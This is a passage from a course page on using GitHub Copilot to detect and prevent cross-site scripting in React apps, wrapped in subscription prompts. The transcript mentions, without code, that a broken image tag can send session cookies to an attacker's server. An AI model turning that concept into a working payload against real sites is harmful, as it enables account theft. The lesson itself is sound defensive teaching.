From the course: GitHub Copilot for Cybersecurity Specialists by Microsoft Press

Unlock this course with a free trial

Join today to access over 25,300 courses taught by industry experts.

Detect and prevent XSS vulnerabilities with GitHub Copilot assistance

Detect and prevent XSS vulnerabilities with GitHub Copilot assistance - Github Copilot Tutorial

From the course: GitHub Copilot for Cybersecurity Specialists by Microsoft Press

Start my 1-month free trial Buy for my team

Detect and prevent XSS vulnerabilities with GitHub Copilot assistance

We end Lesson 1 with cross-site scripting, which targets the browser rather than the server. Copilot can help trace untrusted input and guide you toward safe rendering. If the browser can't distinguish application logic from attacker-supplied data, malicious code runs with the user's privileges. For example, a React component with dangerously set HTML and user-generated HTML comments. Let's look at this real example here in React. This opt-out from React's escaping is the fastest way to resurrect 2005-era XSS risks in a modern app. Another example, a single broken image tag can exfiltrate session cookies to an attacker's server. That's how simple this exploit is. XSS compromises user identity, not just data. It's dangerous because server logs often look perfectly normal. Contoso News, for example, taught Copilot to scan templating files for unsafe DOM manipulation. Within one sprint, they reduced their XSS surface area dramatically.

Contents